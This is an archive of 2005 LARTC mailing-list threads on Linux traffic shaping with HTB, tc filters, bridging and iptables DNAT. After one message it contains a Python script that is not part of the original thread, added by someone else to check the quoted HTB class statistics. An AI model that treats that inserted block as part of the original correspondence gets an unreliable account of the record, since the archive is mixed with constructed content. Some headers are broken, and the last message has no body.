From cvok@bonet.sk Sat Jan 1 09:45:08 2005
From: cvok@bonet.sk (cvok@bonet.sk)
Date: Sat, 1 Jan 2005 10:45:08 +0100
Subject: [LARTC] htb bridge problem, please chceck my config
Message-ID: <1104572708.41d671247a360@www.bonet.sk>

hello. i have following setup:

a machine (winChip 200mhz cpu, 32mb ram, linux 2.4.28) acting like a bridge with
2 interfaces (eth0 - to our ISP, eth1 - to our network)
machine does not have any IP

there is a 802.1q vlan eth0.2
eth0.2 and eth1 are bridged in br0

i have one 4mbit link which i share with my friend, i have 3mbit and he has 1mbit

all our IP addresses are public and we have the following setup

/sbin/tc qdisc add dev eth1 root handle 1: htb default 2
/sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit
/sbin/tc class add dev eth1 parent 1:1 classid 1:2 htb rate 3mbit ceil 3mbit
/sbin/tc class add dev eth1 parent 1:1 classid 1:3 htb rate 1mbit ceil 1mbit
/sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src FRIEDNS_IP flowid 1:3
/sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src MY_IP flowid 1:2

/sbin/tc qdisc add dev eth0.2 root handle 1: htb default 2
/sbin/tc class add dev eth0.2 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit
/sbin/tc class add dev eth0.2 parent 1:1 classid 1:2 htb rate 3mbit ceil 3mbit
/sbin/tc class add dev eth0.2 parent 1:1 classid 1:3 htb rate 1mbit ceil 1mbit
/sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pref 1 u32 match ip dst FRIENDS_IP flowid 1:3
/sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pref 1 u32 match ip dst MY_IP flowid 1:3

but it doesn't work well, my ISP link is stable, but i hardly ever get from my shaped link more 2mbit. where am i making mistake?

Thanks.
Matis

From andy.furniss@dsl.pipex.com Sat Jan 1 23:58:54 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sat, 01 Jan 2005 23:58:54 +0000
Subject: [LARTC] does the inbound traffic affect the outbound on 2 different interfaces
In-Reply-To: <62916e504122306336585e4ed@mail.gmail.com>
References: <62916e504122306336585e4ed@mail.gmail.com>
Message-ID: <41D7393E.5060207@dsl.pipex.com>

Sujith Chennupati wrote:
> hey guys
>
> i am regulating the traffic to & fro by my network through a
> linux gateway , its behaving strange. i regulated Downlink to 2Mbps &
> UPLINK to 500Kbps. both perform well when those are done independent
> i.e. one at a time
>
> but when i do both from a client system ..the downlink however
> continues at 2mbps but the uplink falls down to 100kbps?

You probably need to prioritise empty acks in each direction.

>
> is something wrong with my script or is there some other reason to
> explain this ?????

I've never used CBQ so can't really say, you could do the same thing with HTB.

Andy.

From andy.furniss@dsl.pipex.com Sun Jan 2 00:07:28 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sun, 02 Jan 2005 00:07:28 +0000
Subject: [LARTC] prio
In-Reply-To: <3927344519.20041225190843@inbox.lv>
References: <3927344519.20041225190843@inbox.lv>
Message-ID: <41D73B40.2000207@dsl.pipex.com>

kasp wrote:
> Hi!
>
> Could somebody tell me, what is difference between these two prio
> parameters in http://lartc.org/lartc.html#AEN2241
>
> 1) tc class add dev $DEV parent 1:1 classid 1:10 htb rate ${UPLINK}kbit burst 6k prio 1
>                                                                                  ^^^^^^
> AND
>
> 2) tc filter add dev $DEV parent 1:0 protocol ip prio 10 u32 match ip tos 0x10 0xff flowid 1:10
>                                                  ^^^^^^^
>
> Why they aren't equal?
> Is there some rules to set prio for each of them?
>
>

prio on htb mainly affects the way it shares excess bandwidth - the lower the number the higher the priority.

On filters it lets you choose the order your rules get tested against the packets.
I haven't looked at the script - but the prio on the filter is unlikely to make any noticeable difference if changed/omitted.

Andy.

From andy.furniss@dsl.pipex.com Sun Jan 2 00:15:28 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sun, 02 Jan 2005 00:15:28 +0000
Subject: [LARTC] wonder shaper and vsftp
In-Reply-To: <20041228030251.97439.qmail@web11803.mail.yahoo.com>
References: <20041228030251.97439.qmail@web11803.mail.yahoo.com>
Message-ID: <41D73D20.8060204@dsl.pipex.com>

Kinchan wrote:
> I have a linux server connected into a 100mps LAN, i
> use iptables implementation of shorewall
> (shorewall.net) and then I used the wondershaper.
>
> When I adjusted the values below, I got a download
> speed for vsftp at a whopping 1187.91 KB/s but a
> upload speed is only a painful 27 KB/s.
>
> I don't fully understand the underpinning codes behind
> the wondershaper htb stuff. can someone guide me on
> how can i increase my ftp upload speed?
>
> Note: when i disable the firewall, i get a very slow
> download and upload speed at around 20 KB/s or slower.
> When I try to enable the firewall and then disable the
> traffic shaping, I also got a slow download and
> upload, so I guess the wonder shaper is really doing
> its job.

Are these slow speeds when you do both at once or testing up/down separately? (what do you get with just upload and everything off)

Andy.

From andy.furniss@dsl.pipex.com Sun Jan 2 00:34:50 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sun, 02 Jan 2005 00:34:50 +0000
Subject: [LARTC] Simple case here!
In-Reply-To: <41D17063.6030406@hotpop.com>
References: <41D17063.6030406@hotpop.com>
Message-ID: <41D741AA.9090209@dsl.pipex.com>

Amit Vyas wrote:
>
> Hi All,
>
> I want to setup a machine to connect to internet at a limited rate of 64
> kbps.
> That machine is connected to a switch. so my LAN and Internet both comes
> from the same eth0.
> How can I limit only the internet access from this machine to 64kbps and
> still using 100mbps for LAN
>
> I am trying to implement this Please guide me If i am wrong.
> I mark all the packets going out to LAN.
> Then I can setup a root qdisc to classify packets based on that mark. If
> match then I can setup a class to accept those setup a fifo for those
> packets. but if the packets are not for the LAN then i can pass them to
> other class which is tbf shaping at rate 64kbps.
>
> Am i right on these lines.
> This is the setup
>
> +------------+     eth0      +-----------+   internet
> |  machine   |---------------|  Switch   |-------------
> +------------+               +-----------+
>
> trying to get some thing like this
>
>              root qdisc (CBQ or something)
>                /                  \
>               /                    \
>              /                      \
>             /                        \
>          class                      class
>   Internal LAN Packets    Any other unclassified Packets
>           |                           |
>           |                           |
>         FIFO                  TBF (rate 64kbps)
>
> Please Help me out with marking the packets and to classify them.
> Just started off with Traffic Shaping. giggles...... : )
>
> It is also possible to alternatively to mark internet traffic as it
> would be less in comparison to LAN and thus processor friendly.
>
> Amit Vyas

I would use netfilter + HTB something like -

$TC qdisc add dev eth0 root handle 1:0 htb default 0
$TC class add dev eth0 parent 1:0 classid 1:1 htb rate 64kbit
$TC filter add dev eth0 parent 1:0 protocol ip handle 1 fw flowid 1:1

$IPTABLES -t mangle -A POSTROUTING -o eth0 --dst ! 192.168.0.0/24 -j MARK --set-mark 1

Depending on what the PC does it may be nicer to prioritise empty acks / udp headed for the internet over bulk traffic.

Andy.

From andy.furniss@dsl.pipex.com Sun Jan 2 00:37:25 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sun, 02 Jan 2005 00:37:25 +0000
Subject: [LARTC] traffic shaping , where?
In-Reply-To: <41C982BB00004EE2@ims4d.cp.tin.it>
References: <41C982BB00004EE2@ims4d.cp.tin.it>
Message-ID: <41D74245.7070103@dsl.pipex.com>

thebet@tin.it wrote:
> Hi
> I would want to use the patch for squid released by patrick mcHardy, but
> it requires that squid is located on the same machine that does traffic
> shaping. My configuration is different:
> i have the screening HDSL router directly connected to a multi-ethernet
> firewall and the proxy located on a DMZ box.
> i would want the firewall doing traffic shaping.
>
>          Internet
>             |
> -------------------------
> -      HDSL ROUTER      -
> -------------------------
>             |
>             |
> -------------------------              -----------------
> -       FIREWALL        - ----------   -     PROXY     -
> -------------------------              -----------------
>
>
>
> To the point:
> have sense to make traffic shaping on a dmz box that it's not directly controlling
> the internet link?

I would shape on the firewall.

Andy.

From andy.furniss@dsl.pipex.com Sun Jan 2 01:07:28 2005
From: andy.furniss@dsl.pipex.com (Andy Furniss)
Date: Sun, 02 Jan 2005 01:07:28 +0000
Subject: [LARTC] Shaping traffic on heavily oversubscribed links?
In-Reply-To: <41B44890.4090401@comkey.spark.net.gr>
References: <41A5A31B.8010901@expertron.co.za> <41B44890.4090401@comkey.spark.net.gr>
Message-ID: <41D74950.5010407@dsl.pipex.com>

Dimitris Kotsonis wrote:
> Justin Schoeman wrote:
>
>> Hi all,
>>
>> I am having some fun with traffic shaping, and have run into an
>> interesting situation. Here in South Africa, most internet links are
>> heavily oversubscribed, which means that in most cases the local link
>> is _not_ the bottleneck, and shaping on the local link does not help
>> that much...
>>
>
> We have the same problem in DSL lines here in Greece.
>
> I have found that while the average effective speed on such lines varies,
> the average rate of packets is more or less constant. I have a theory
> for this.
> I believe that the routers that forward the traffic on
> congested lines - on ISPs and on the ATM circuits at the telcoms - don't
> take the extra time needed to calculate the size of the packets and
> distribute the traffic on a per packet basis. This leads to a 'fairness'
> among the end receivers based on packets/sec instead of bandwidth.
>
> To be more specific. In my ADSL line I usually achieve between 20-30 pps
> (measured with MRTG). With an average packet size of 1500 this is 20-45
> kbytes/sec. But packets sizes close to the MTU are found on single
> ftp/http connections and pretty much nowhere else. Packet sizes of 400
> to 500 are more realistic, especially when p2p programs are involved.
> 20-30 packets give 8-10kbytes/sec. You can expect even less when using
> voip programs which utilize smaller packets.
>
> If you find that a single FTP session tends to get more bandwidth than
> p2p programs or multiuser traffic then you have a similar problem to
> our own. I would suggest that you setup MRTG to monitor packets to
> research further into this.

It is normal for an FTP download to take over from p2ps the latter are likely to be higher latency, so TCP will let a lower latency FTP grab more bandwidth.

Try shaping with HTB and sfq - It should help.

>
>
>
>> Does anybody have some tips on shaping such links? How can you get
>> interactive traffic if you don't know how much bandwidth to reserve
>> for it? How can you give fair access to a link if you don't know what
>> the link capacity is?
>>
>
> Well, I am working on one. Since I can't shape bandwidth because it
> fluctuates erratically with time and usage I decided to shape packets. I
> have created a new queueing discipline based on TBF which uses packets
> instead of bytes for its tokens and I am allocating a constant
> packet/sec rate on each user of my ADSL line. A better solution would be
> to create an HTB alike packet-based qdisc for dynamic shaping.
>
> If you find that you have the same problem as me and you want to
> experiment with a packet-based TBF qdisc I can send you a patch for
> linux-2.6.8 and iproute2 in this list.
>
> I would like to hear your thought on this anyway ...
>
> Dimitris
>
>
>
> _______________________________________________
> LARTC mailing list / LARTC@mailman.ds9a.nl
> http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
>

From Zhenyu Wu"

Hello,

As it is well known that CBQ is the class based queue. But i am confused on the word "class" now, especially it is used in Diffserv. IMO, different classes should mean that there are different kinds of traffics, so the class should be defined by the parameters (such as bandwidth, priority..) the traffic wanted. That is, using cbq we can define different kinds of traffics which need different bandwidth at the gateway, am i right?? Then, in diffserv the traffic is identified by the DSCP, right?

From Floyd's paper Link-sharing and Resource Management Models for Packet Networks, we can see if there are two classes of traffic such as class A and class B, and each of them has traffics video and ftp, then how the two different FTP are identified in diffserv, by their DSCP? IMO, at first, according to the bandwidth the traffic needed, the traffic is classified into class A or class B, then at each class the traffic is identified by their DSCP.

Eagerly waiting for your reply! Happy New Year!

From lartc@tracker.fire-world.de Sun Jan 2 04:05:22 2005
From: lartc@tracker.fire-world.de (Sebastian Wiesinger)
Date: Sun, 2 Jan 2005 05:05:22 +0100
Subject: [LARTC] Performance Loss with HTB/tcng?
Message-ID: <20050102040521.GB29646@data.fire-world.de>

Hi,

I try to shape my incoming traffic.
I have 2MBit/s DSL bandwidth and the following ruleset (on the internal interface):

$INT="eth1";
$INT_NET=192.168.1.0;
$MAX_IN=2Mbps;

dev $INT {
    egress {
        class (<$int>) if ip_src:24 == $INT_NET;
        class (<$ssh>) if tcp_sport == PORT_SSH;
        class (<$smtp>) if tcp_sport == PORT_SMTP;
        class (<$http>) if tcp_sport == PORT_HTTP;
        class (<$http>) if tcp_sport == PORT_HTTPS;
        class (<$nntp>) if tcp_sport == PORT_NNTP;
        class (<$nntp>) if tcp_sport == PORT_NNTPS;
        class (<$other>) if 1;

        htb() {
            class (rate 100Mbps, ceil 100Mbps) {
                class (rate $MAX_IN, ceil $MAX_IN) {
                    $ssh = class (rate 100kbps, ceil $MAX_IN, prio 1) {sfq;};
                    $smtp = class (rate 100kbps, ceil $MAX_IN, prio 2) {sfq;};
                    $http = class (rate 100kbps, ceil $MAX_IN, prio 2) {sfq;};
                    $nntp = class (rate 100kbps, ceil $MAX_IN, prio 2) {sfq;};
                    $other = class (rate $MAX_IN-400kbps, ceil $MAX_IN, prio 0) {sfq;};
                }
                $int = class (rate 100Mbps-$MAX_IN, ceil 100Mbps) {sfq;};
            }
        }
    }
}

My problem is: when I download something with bittorrent (class $other) I have 150-200 KB/s without shaping and 80-100KB/s with shaping enabled.

Statistics for $other:

class htb 2:7 parent 2:2 leaf 7: prio 0 rate 1600Kbit ceil 2Mbit burst 3599b cburst 4Kb
 Sent 8271156 bytes 8165 pkts (dropped 0, overlimits 0 requeues 0)
 rate 108047bit 107pps
 lended: 7499 borrowed: 666 giants: 0
 tokens: -16443 ctokens: -13925

I don't know if there is a more elegant way to shape this or what I can do to get more performance.

Regards,

Sebastian

--
GPG Key-ID: 0x76B79F20 (0x1B6034F476B79F20)
Wehret den Anfaengen: http://odem.org/informationsfreiheit/
Thunder rolled. ... It rolled a six.
--Terry Pratchett, Guards! Guards!
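A way to sanity-check the class statistics quoted in the message above, added here as an example (it is not part of the original post, nor code from tc or tcng): it parses the `tc -s class show` block and tests whether the estimator figure printed as `bit` fits the byte and packet counters better as bits/s or as bytes/s, then compares the result with the configured rate and ceil. The function names and the decimal Kbit/Mbit multipliers are assumptions of this example.

```python
import re

# Constructed input: the class statistics as quoted in the message above.
SAMPLE = """\
class htb 2:7 parent 2:2 leaf 7: prio 0 rate 1600Kbit ceil 2Mbit burst 3599b cburst 4Kb
 Sent 8271156 bytes 8165 pkts (dropped 0, overlimits 0 requeues 0)
 rate 108047bit 107pps
 lended: 7499 borrowed: 666 giants: 0
 tokens: -16443 ctokens: -13925
"""

# Assumption of this example: tc prints rates with decimal multipliers.
_MULT = {"bit": 1, "Kbit": 1_000, "Mbit": 1_000_000}


def parse_htb_class(text):
    """Pull the configured limits and the counters out of one HTB class block."""
    cfg = re.search(r"rate (\d+)(Kbit|Mbit|bit) ceil (\d+)(Kbit|Mbit|bit)", text)
    sent = re.search(
        r"Sent (\d+) bytes (\d+) pkts \(dropped (\d+), overlimits (\d+)", text
    )
    # The rate estimator line; "rate 1600Kbit" cannot match because of the K.
    est = re.search(r"rate (\d+)bit (\d+)pps", text)
    lend = re.search(r"lended: (\d+) borrowed: (\d+)", text)
    if not (cfg and sent and est and lend):
        raise ValueError("not a complete HTB class block from 'tc -s class show'")
    return {
        "rate_bps": int(cfg.group(1)) * _MULT[cfg.group(2)],
        "ceil_bps": int(cfg.group(3)) * _MULT[cfg.group(4)],
        "bytes": int(sent.group(1)),
        "pkts": int(sent.group(2)),
        "dropped": int(sent.group(3)),
        "overlimits": int(sent.group(4)),
        "est": int(est.group(1)),
        "pps": int(est.group(2)),
        "lended": int(lend.group(1)),
        "borrowed": int(lend.group(2)),
    }


def analyse(stats):
    """Cross-check the printed estimator figure against the packet counters."""
    avg_pkt = stats["bytes"] / stats["pkts"]      # mean packet size in bytes
    implied = avg_pkt * stats["pps"]              # bytes/s implied by the pps figure
    printed = stats["est"]
    # Relative error of each reading of the printed figure against 'implied'.
    err_as_bytes = abs(printed - implied) / implied
    err_as_bits = abs(printed / 8 - implied) / implied
    unit = "bytes/s" if err_as_bytes < err_as_bits else "bits/s"
    throughput_bps = printed * 8 if unit == "bytes/s" else printed
    handed_out = stats["lended"] + stats["borrowed"]
    return {
        "avg_pkt_bytes": round(avg_pkt),
        "estimator_unit": unit,
        "throughput_bps": throughput_bps,
        "share_of_rate": round(throughput_bps / stats["rate_bps"], 2),
        "share_of_ceil": round(throughput_bps / stats["ceil_bps"], 2),
        "borrowed_share": round(stats["borrowed"] / handed_out, 3),
        "dropped": stats["dropped"],
    }


if __name__ == "__main__":
    for key, value in analyse(parse_htb_class(SAMPLE)).items():
        print(f"{key:16} {value}")
```

For the quoted block the counters agree with a bytes/s reading of the estimator (about 864 kbit/s), which is below both the class rate and its ceil, with no drops recorded in the class.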
From ionut@topall.ro Sun Jan 2 11:26:18 2005
From: ionut@topall.ro (ionut@topall.ro)
Date: Sun, 2 Jan 2005 13:26:18 +0200 (EET)
Subject: [LARTC] Re: htb bridge problem, please chceck my config
In-Reply-To: <20050102055602.17138.47839.Mailman@outpost.ds9a.nl>
References: <20050102055602.17138.47839.Mailman@outpost.ds9a.nl>
Message-ID: <3295.81.180.254.1.1104665178.squirrel@81.180.254.1>

> a machine (winChip 200mhz cpu, 32mb ram, linux 2.4.28) acting like a bridge with
> 2 interfaces (eth0 - to our ISP, eth1 - to our network)
> machine does not have any IP
>
> there is a 802.1q vlan eth0.2
> eth0.2 and eth1 are bridged in br0
>
> i have one 4mbit link which i share with my friend, i have 3mbit and he has 1mbit
>
> all our IP addresses are public and we have the following setup
>
> /sbin/tc qdisc add dev eth1 root handle 1: htb default 2
> /sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit
> /sbin/tc class add dev eth1 parent 1:1 classid 1:2 htb rate 3mbit ceil 3mbit
> /sbin/tc class add dev eth1 parent 1:1 classid 1:3 htb rate 1mbit ceil 1mbit

your filters will not work because of the parent

> /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src FRIEDNS_IP flowid 1:3

tc filter add dev eth1 prio 7 parent 1: protocol ip u32 match ip dst FRIENDS_IP flowid 1:3

> /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src MY_IP flowid 1:2

tc filter add dev eth1 prio 7 parent 1: protocol ip u32 match ip dst MY_IP flowid 1:2

From Oswin Budiman Mon Jan 3 03:03:10 2005
From: Oswin Budiman (Oswin Budiman)
Date: Mon, 3 Jan 2005 10:03:10 +0700
Subject: [LARTC] (no subject)
Message-ID: <671374730501021903512d7fca@mail.gmail.com>

> Have you done ifconfig lo mtu 1500 ?

Yup, it also didn't work. Any clue?

Just for note, when I try a TBF shaping example from internet, it works flawlessly.
--
- There's always the first for everything -

From Oswin Budiman Mon Jan 3 03:04:49 2005
From: Oswin Budiman (Oswin Budiman)
Date: Mon, 3 Jan 2005 10:04:49 +0700
Subject: [LARTC] HTB - ethloop - overlimits?
Message-ID: <6713747305010219046d8d2818@mail.gmail.com>

Sorry, I forgot to write the subject...

> Have you done ifconfig lo mtu 1500 ?

Yup, it also didn't work. Any clue?

Just for note, when I try a TBF shaping example from internet, it works flawlessly.

From marcogh@linux.it Mon Jan 3 11:22:15 2005
From: marcogh@linux.it (marco ghidinelli)
Date: Mon, 3 Jan 2005 12:22:15 +0100
Subject: [LARTC] Weighted packet shaping?
In-Reply-To: <20041228092343.GA8003@linux.comp>
References: <41C97B57.80207@dsl.pipex.com> <20041222153607.GC11969@linux.comp> <41C9FB14.6000805@dsl.pipex.com> <20041223105418.GA19364@linux.comp> <41CC22F1.70907@dsl.pipex.com> <20041224150730.GA18760@linux.comp> <41CC457A.5040405@dsl.pipex.com> <20041226042648.GA24904@linux.comp> <41CEB816.5030902@dsl.pipex.com> <20041228092343.GA8003@linux.comp>
Message-ID: <20050103112214.GA10708@circolab.net>

On Tue, Dec 28, 2004 at 07:53:43PM +1030, Mark Williams (MWP) wrote:
>
> Ok...
> Using your script gave the following (from 17:30 onwards):
>
> http://www.overclockers.com.au/~mwp/temp/tc-1hour-yours.png
>
> Purple is class 23; all other traffic, in this case bittorrent.
> Blue is class 21; a windows box, in this case an FTP transfer.
>
> Shouldn't class 23 still be dropping off further than that?
> It seems HTB is wanting to share traffic equally among on the classes rather than by priority.
>
> Your script is pretty much having the same effect as mine :(

ok, maybe i'm wrong, but i try to run the same script, and i think that the script have problem setting prio 0 on filters:

running:

$TC filter add dev $IFNAME parent 1:0 prio 0 protocol ip handle 22 fw flowid 1:20
$TC filter add dev $IFNAME parent 1:0 prio 2 protocol ip handle 21 fw flowid 1:21

gave me:

# tc filter list dev eth0
filter parent 1: protocol ip pref 2 fw
filter parent 1: protocol ip pref 2 fw handle 0x15 classid 1:21
filter parent 1: protocol ip pref 49152 fw
filter parent 1: protocol ip pref 49152 fw handle 0x16 classid 1:20
----------------------------------^^^^^

don't blame me if this is obvious/wrong/stupid. :)

2.6.10, with latest iproute2

--
BOFH excuse #212:

Of course it doesn't work. We've performed a software upgrade.

From lists@L8R.net Mon Jan 3 18:32:55 2005
From: lists@L8R.net (Brad Barnett)
Date: Mon, 3 Jan 2005 13:32:55 -0500
Subject: [LARTC] load balancing and DNAT
Message-ID: <20050103133255.2474878c@be.back.l8r.net>

Does anyone know if load balancing and DNAT work well together? I know that load balancing and NAT do not, but what about a simple port forward?

I can't apply Julian Anastasov's patches, because they don't work with PPTP patches. :/

Anyhow, a simple:

iptables -t nat -A PREROUTING -i eth0 -p tcp --dport xxx -j DNAT --to yyy:xxx
iptables -I FORWARD -i eth0 -d yyy -p tcp --dport xxx -o eth1 -j ACCEPT

does not seem to work.

From stef.coene@docum.org Mon Jan 3 21:33:15 2005
From: stef.coene@docum.org (Stef Coene)
Date: Mon, 3 Jan 2005 22:33:15 +0100
Subject: [LARTC] htb bridge problem, please chceck my config
In-Reply-To: <1104572708.41d671247a360@www.bonet.sk>
References: <1104572708.41d671247a360@www.bonet.sk>
Message-ID: <200501032233.15631.stef.coene@docum.org>

On Saturday 01 January 2005 10:45, cvok@bonet.sk wrote:
> hello.
> i have following setup:
>
> a machine (winChip 200mhz cpu, 32mb ram, linux 2.4.28) acting like a bridge with
> 2 interfaces (eth0 - to our ISP, eth1 - to our network)
> machine does not have any IP
>
> there is a 802.1q vlan eth0.2
> eth0.2 and eth1 are bridged in br0
>
> i have one 4mbit link which i share with my friend, i have 3mbit and he has 1mbit
>
> all our IP addresses are public and we have the following setup
>
> /sbin/tc qdisc add dev eth1 root handle 1: htb default 2
> /sbin/tc class add dev eth1 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit
> /sbin/tc class add dev eth1 parent 1:1 classid 1:2 htb rate 3mbit ceil 3mbit
> /sbin/tc class add dev eth1 parent 1:1 classid 1:3 htb rate 1mbit ceil 1mbit
> /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src FRIEDNS_IP flowid 1:3
> /sbin/tc filter add dev eth1 protocol ip parent 1:0 pref 1 u32 match ip src MY_IP flowid 1:2
>
>
> /sbin/tc qdisc add dev eth0.2 root handle 1: htb default 2
> /sbin/tc class add dev eth0.2 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit
> /sbin/tc class add dev eth0.2 parent 1:1 classid 1:2 htb rate 3mbit ceil 3mbit
> /sbin/tc class add dev eth0.2 parent 1:1 classid 1:3 htb rate 1mbit ceil 1mbit
> /sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pref 1 u32 match ip dst FRIENDS_IP flowid 1:3
> /sbin/tc filter add dev eth0.2 protocol ip parent 1:0 pref 1 u32 match ip dst MY_IP flowid 1:3
>
>
> but it doesn't work well, my ISP link is stable, but i hardly ever get from
> my shaped link more 2mbit. where am i making mistake?

Some stuff to check out:
- are the tc stats changing?
- try ceil 3.5mbit so _you_ are the bottleneck
- I'm not sure if you can shape on a vlan

Oh, your filters are ok.
Stef

--
stef.coene@docum.org
 "Using Linux as bandwidth manager"
     http://www.docum.org/

From mingching.tiew@redtone.com Tue Jan 4 01:36:59 2005
From: mingching.tiew@redtone.com (Ming-Ching Tiew)
Date: Tue, 4 Jan 2005 09:36:59 +0800
Subject: [LARTC] load balancing and DNAT
References: <20050103133255.2474878c@be.back.l8r.net>
Message-ID: <008201c4f1fd$e3d7ff20$0100a8c0@newlife>

From: "Brad Barnett"
>
> I can't apply Julian Anastasov's patches, because they don't work with
> PPTP patches. :/
>

I must have missed something. May I know where you learned that Julian Anastasov's patches won't work with PPTP patches ? Any URL ?

Cheers

From lists@L8R.net Tue Jan 4 02:03:37 2005
From: lists@L8R.net (Brad Barnett)
Date: Mon, 3 Jan 2005 21:03:37 -0500
Subject: [LARTC] load balancing and DNAT
In-Reply-To: <008201c4f1fd$e3d7ff20$0100a8c0@newlife>
References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife>
Message-ID: <20050103210337.6d9e0ceb@be.back.l8r.net>

On Tue, 4 Jan 2005 09:36:59 +0800 "Ming-Ching Tiew" wrote:

>
> From: "Brad Barnett"
> >
> > I can't apply Julian Anastasov's patches, because they don't work with
> > PPTP patches. :/
> >
>
> I must have missed something. May I know where you learned that
> Julian Anastasov's patches won't work with PPTP patches ? Any URL ?
>

Personal experience. I can't get any recent 2.4.x kernel to compile with PPTP and the Julian Anastasov's patches. It's been over a month now, but I tried several versions, I believe back to 2.4.25...

From Zhenyu Wu"

Hello,

Normally, in addition to such qdisc scheduler mechanisms as FIFO, PQ, WRR, WFQ, are there any more? Then, there is a confusion on scheduler in Linux environment: Assume there is a qdisc, such as RED as a leaf qdisc in a router, we know, if there is packet which want to enqueue the packet, the Function red_enqueue is called, but when the packet leave the queue(when the Function red_dequeue is called)?
I think it is meaningless when the packet leaves the queue just it entered it. Is there anything need to be done between the packet's enqueue and dequeue?

Best,

From mingching.tiew@redtone.com Tue Jan 4 02:27:17 2005
From: mingching.tiew@redtone.com (Ming-Ching Tiew)
Date: Tue, 4 Jan 2005 10:27:17 +0800
Subject: [LARTC] load balancing and DNAT
References: <20050103133255.2474878c@be.back.l8r.net><008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net>
Message-ID: <00e301c4f204$e956b020$0100a8c0@newlife>

From: "Brad Barnett"
>
> Personal experience. I can't get any recent 2.4.x kernel to compile with
> PPTP and the Julian Anastasov's patches. It's been over a month now, but
> I tried several versions, I believe back to 2.4.25...
>

PPTP server or client ? I supposed you mean MPPE patches ? I compiled it together with Julian Anastasov's patches on 2.4.27. I am not sure if they work together, but it compiles at least !

Cheers

From lists@L8R.net Tue Jan 4 02:30:10 2005
From: lists@L8R.net (Brad Barnett)
Date: Mon, 3 Jan 2005 21:30:10 -0500
Subject: [LARTC] load balancing and DNAT
In-Reply-To: <00e301c4f204$e956b020$0100a8c0@newlife>
References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net> <00e301c4f204$e956b020$0100a8c0@newlife>
Message-ID: <20050103213010.444f999f@be.back.l8r.net>

On Tue, 4 Jan 2005 10:27:17 +0800 "Ming-Ching Tiew" wrote:

>
> From: "Brad Barnett"
> >
> > Personal experience. I can't get any recent 2.4.x kernel to compile
> > with PPTP and the Julian Anastasov's patches. It's been over a month
> > now, but I tried several versions, I believe back to 2.4.25...
> >
>
> PPTP server or client ? I supposed you mean MPPE patches ?
> I compiled it together with Julian Anastasov's patches on 2.4.27.
> I am not sure if they work together, but it compiles at least !

MPPE patches.

I have a feeling that you don't have some of the same .config options that I do.
From mingching.tiew@redtone.com Tue Jan 4 03:11:10 2005
From: mingching.tiew@redtone.com (Ming-Ching Tiew)
Date: Tue, 4 Jan 2005 11:11:10 +0800
Subject: [LARTC] load balancing and DNAT
References: <20050103133255.2474878c@be.back.l8r.net><008201c4f1fd$e3d7ff20$0100a8c0@newlife><20050103210337.6d9e0ceb@be.back.l8r.net><00e301c4f204$e956b020$0100a8c0@newlife> <20050103213010.444f999f@be.back.l8r.net>
Message-ID: <017801c4f20b$13887ad0$0100a8c0@newlife>

From: "Brad Barnett"
>
> >
> >
> > PPTP server or client ? I supposed you mean MPPE patches ?
> > I compiled it together with Julian Anastasov's patches on 2.4.27.
> > I am not sure if they work together, but it compiles at least !
>
> MPPE patches.
>
> I have a feeling that you don't have some of the same .config options that
> I do.

Really ? I am more thinking we are not having the exact same patches. The PPTP stuff has a lot of ***OLD*** information floating around.

Cheers.

From lists@L8R.net Tue Jan 4 03:23:11 2005
From: lists@L8R.net (Brad Barnett)
Date: Mon, 3 Jan 2005 22:23:11 -0500
Subject: [LARTC] load balancing and DNAT
In-Reply-To: <017801c4f20b$13887ad0$0100a8c0@newlife>
References: <20050103133255.2474878c@be.back.l8r.net> <008201c4f1fd$e3d7ff20$0100a8c0@newlife> <20050103210337.6d9e0ceb@be.back.l8r.net> <00e301c4f204$e956b020$0100a8c0@newlife> <20050103213010.444f999f@be.back.l8r.net> <017801c4f20b$13887ad0$0100a8c0@newlife>
Message-ID: <20050103222311.105e7c9e@be.back.l8r.net>

On Tue, 4 Jan 2005 11:11:10 +0800 "Ming-Ching Tiew" wrote:

>
> From: "Brad Barnett"
>
> > > >
> > > >
> > > > PPTP server or client ? I supposed you mean MPPE patches ?
> > > > I compiled it together with Julian Anastasov's patches on 2.4.27.
> > > > I am not sure if they work together, but it compiles at least !
> > >
> > > MPPE patches.
> > >
> > > I have a feeling that you don't have some of the same .config options
> > > that I do.
> >
> > Really ? I am more thinking we are not having the exact same patches.
> > The PPTP stuff has a lot of ***OLD*** information floating around.
> >

It does, but before we go too much further, does anyone have an answer to my original question? I'm bogged for time (aren't we all? ;), and I'd prefer to just find out if my problems with DNAT are indeed from what I think...

Other than that.. I'm using the 'linux-2.4.25-mppe-20040216.patch' MPPE patches....

From mingching.tiew@redtone.com Tue Jan 4 03:33:59 2005
From: mingching.tiew@redtone.com (Ming-Ching Tiew)
Date: Tue, 4 Jan 2005 11:33:59 +0800
Subject: [LARTC] load balancing and DNAT
